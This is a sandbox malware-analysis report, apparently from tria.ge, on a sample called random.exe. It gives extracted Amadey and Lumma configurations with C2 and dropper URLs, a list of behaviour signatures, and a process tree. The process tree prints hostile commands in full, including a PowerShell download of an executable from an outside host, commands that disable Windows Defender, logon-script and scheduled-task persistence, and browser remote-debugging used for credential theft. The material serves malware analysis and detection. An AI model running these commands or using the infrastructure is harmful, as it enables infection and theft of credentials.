Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    79s
  • max time network
    255s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/03/2025, 22:00

General

  • Target

    random.exe

  • Size

    2.0MB

  • MD5

    321b34c0dae5853fda55f5a40b9892a4

  • SHA1

    b707aa6d2b554ac97904252f1264b1ace9655938

  • SHA256

    d682c945603bd8e08ca2016cc7482b118d6573253989738c34c837836c359175

  • SHA512

    2950c8989ab5d3ea5bce42c72c5c12ef9ab142192674d8dc7fe5225a971626bdfcb09aa82f27cd4a68c2ba17069ae9ae09aeb3539dea98a892c5f080dc56e16d

  • SSDEEP

    49152:JCKMe1ymi2WNftQe0/6Stxyva9MW7dUyvj8RqPhmWP:cKLlA30/iva9MgdwaV

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://zfurrycomp.top/api

https://crosshairc.life/api

https://mrodularmall.top/api

https://jowinjoinery.icu/api

https://legenassedk.top/api

https://htardwarehu.icu/api

https://8cjlaspcorne.icu/api

https://bugildbett.top/api

https://adweaponrywo.digital/api

https://begindecafer.world/api

https://9garagedrootz.top/api

https://modelshiverd.icu/api

https://arisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://ksterpickced.digital/api

https://biochextryhub.bet/api

https://q8explorebieology.run/api

https://gadgethgfub.icu/api

Extracted

Family

lumma

C2

https://moderzysics.top/api

https://codxefusion.top/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • Async RAT payload 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 3 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 21 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 26 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 30 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 40 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 61 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Registers new Windows logon scripts automatically executed at logon. 1 TTPs 1 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 7 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • UPX packed file 52 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 22 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 35 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • GoLang User-Agent 2 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies Internet Explorer settings 1 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:676
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies data under HKEY_USERS
        PID:6364
        • C:\Windows\system32\sc.exe
          "C:\Windows\system32\sc.exe" qc windefend
          3⤵
          • Launches sc.exe
          PID:6768
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
          3⤵
            PID:6852
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /groups
            3⤵
              PID:6184
            • C:\Windows\system32\net1.exe
              "C:\Windows\system32\net1.exe" stop windefend
              3⤵
                PID:6316
              • C:\Windows\system32\sc.exe
                "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                3⤵
                • Launches sc.exe
                PID:6376
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Modifies data under HKEY_USERS
              PID:6392
              • C:\Windows\system32\sc.exe
                "C:\Windows\system32\sc.exe" qc windefend
                3⤵
                • Launches sc.exe
                PID:6804
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                3⤵
                  PID:6912
                • C:\Windows\system32\whoami.exe
                  "C:\Windows\system32\whoami.exe" /groups
                  3⤵
                    PID:3508
                  • C:\Windows\system32\net1.exe
                    "C:\Windows\system32\net1.exe" stop windefend
                    3⤵
                      PID:6340
                    • C:\Windows\system32\sc.exe
                      "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                      3⤵
                      • Launches sc.exe
                      PID:3628
                • C:\Windows\system32\sihost.exe
                  sihost.exe
                  1⤵
                  • Suspicious use of SetThreadContext
                  PID:2964
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2044
                • C:\Users\Admin\AppData\Local\Temp\random.exe
                  "C:\Users\Admin\AppData\Local\Temp\random.exe"
                  1⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Checks computer location settings
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  PID:1716
                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                    "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                    2⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Downloads MZ/PE file
                    • Checks BIOS information in registry
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:224
                    • C:\Users\Admin\AppData\Local\Temp\10003000101\d472d3c04a.exe
                      "C:\Users\Admin\AppData\Local\Temp\10003000101\d472d3c04a.exe"
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:60
                      • C:\Users\Admin\AppData\Local\Temp\10003000101\d472d3c04a.exe
                        "C:\Users\Admin\AppData\Local\Temp\10003000101\d472d3c04a.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:452
                      • C:\Users\Admin\AppData\Local\Temp\10003000101\d472d3c04a.exe
                        "C:\Users\Admin\AppData\Local\Temp\10003000101\d472d3c04a.exe"
                        4⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:916
                    • C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
                      "C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"
                      3⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4824
                    • C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
                      "C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"
                      3⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:1936
                      • C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                        "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
                        4⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:4988
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\'
                          5⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4764
                        • C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\Bthvgkck.exe
                          "C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\Bthvgkck.exe"
                          5⤵
                          • Executes dropped EXE
                          • Enumerates connected drives
                          • Suspicious use of NtCreateThreadExHideFromDebugger
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:5328
                    • C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe
                      "C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"
                      3⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1416
                    • C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe
                      "C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe"
                      3⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:5536
                      • C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                        C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:1552
                        • C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                          C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of WriteProcessMemory
                          PID:4204
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\SysWOW64\cmd.exe
                            6⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: MapViewOfSection
                            PID:5076
                            • C:\Windows\SysWOW64\explorer.exe
                              C:\Windows\SysWOW64\explorer.exe
                              7⤵
                              • System Location Discovery: System Language Discovery
                              PID:344
                    • C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe
                      "C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe"
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:6016
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -c "Invoke-WebRequest -Uri 'https://safetyingold.com/share/4822aa372544ea4642142339b22d22421d08bdb543cd2de334b3fd0e5fc07565.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe' -Headers @{'User-Agent'='build2'}"
                        4⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Downloads MZ/PE file
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5452
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Registers new Windows logon scripts automatically executed at logon.
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4644
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe
                        "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe"
                        4⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:4976
                        • C:\Windows\Temp\{BD28B4D0-D301-44C9-A1AD-039B27918504}\.cr\rsfff01fff.exe
                          "C:\Windows\Temp\{BD28B4D0-D301-44C9-A1AD-039B27918504}\.cr\rsfff01fff.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe" -burn.filehandle.attached=528 -burn.filehandle.self=536
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          PID:5912
                          • C:\Windows\Temp\{60E96291-2896-4D7B-8391-7733811271EA}\.ba\irestore.exe
                            C:\Windows\Temp\{60E96291-2896-4D7B-8391-7733811271EA}\.ba\irestore.exe
                            6⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:1832
                            • C:\Users\Admin\AppData\Roaming\DownloadscanRs\irestore.exe
                              C:\Users\Admin\AppData\Roaming\DownloadscanRs\irestore.exe
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: MapViewOfSection
                              PID:5204
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\SysWOW64\cmd.exe
                                8⤵
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: MapViewOfSection
                                PID:3996
                                • C:\Users\Admin\AppData\Local\Temp\monUninstall.exe
                                  C:\Users\Admin\AppData\Local\Temp\monUninstall.exe
                                  9⤵
                                    PID:3904
                      • C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe
                        "C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe"
                        3⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Drops file in Windows directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:4160
                        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                          4⤵
                          • Downloads MZ/PE file
                          • Checks computer location settings
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:2428
                          • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                            "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                            5⤵
                            • Executes dropped EXE
                            PID:3696
                            • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                              "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:2120
                          • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
                            "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5264
                            • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
                              "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                              6⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5048
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5264 -s 800
                              6⤵
                              • Program crash
                              PID:5728
                          • C:\Users\Admin\AppData\Local\Temp\10005500101\alexx111.exe
                            "C:\Users\Admin\AppData\Local\Temp\10005500101\alexx111.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:3352
                            • C:\Users\Admin\AppData\Local\Temp\10005500101\alexx111.exe
                              "C:\Users\Admin\AppData\Local\Temp\10005500101\alexx111.exe"
                              6⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1184
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 792
                              6⤵
                              • Program crash
                              PID:3812
                          • C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe
                            "C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"
                            5⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:5276
                            • C:\Windows\SysWOW64\SCHTASKS.exe
                              SCHTASKS /Create /SC MINUTE /MO 5 /TN "XblGameSave\XblGameSvTask" /TR "C:\Users\Admin\AppData\Roaming\HexRays\frameapphost.exe" /F /RL HIGHEST
                              6⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:5180
                          • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                            "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:3816
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                              6⤵
                              • System Location Discovery: System Language Discovery
                              • Checks processor information in registry
                              PID:4188
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                7⤵
                                • Uses browser remote debugging
                                PID:6216
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff3572dcf8,0x7fff3572dd04,0x7fff3572dd10
                                  8⤵
                                    PID:6284
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                  7⤵
                                  • Uses browser remote debugging
                                  PID:1632
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7fff3572dcf8,0x7fff3572dd04,0x7fff3572dd10
                                    8⤵
                                      PID:5720
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1568,i,10511659783279570695,1290487874649651196,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3180 /prefetch:3
                                      8⤵
                                        PID:408
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=3152,i,10511659783279570695,1290487874649651196,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3148 /prefetch:2
                                        8⤵
                                          PID:2760
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2760,i,10511659783279570695,1290487874649651196,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3216 /prefetch:1
                                          8⤵
                                          • Uses browser remote debugging
                                          PID:4624
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2168,i,10511659783279570695,1290487874649651196,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3188 /prefetch:8
                                          8⤵
                                            PID:2596
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2768,i,10511659783279570695,1290487874649651196,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3236 /prefetch:1
                                            8⤵
                                            • Uses browser remote debugging
                                            PID:5196
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4204,i,10511659783279570695,1290487874649651196,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4260 /prefetch:2
                                            8⤵
                                            • Uses browser remote debugging
                                            PID:6224
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4596,i,10511659783279570695,1290487874649651196,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4624 /prefetch:1
                                            8⤵
                                            • Uses browser remote debugging
                                            PID:6768
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5124,i,10511659783279570695,1290487874649651196,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5116 /prefetch:8
                                            8⤵
                                              PID:776
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5440,i,10511659783279570695,1290487874649651196,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5448 /prefetch:8
                                              8⤵
                                                PID:6376
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                              7⤵
                                              • Uses browser remote debugging
                                              PID:2164
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
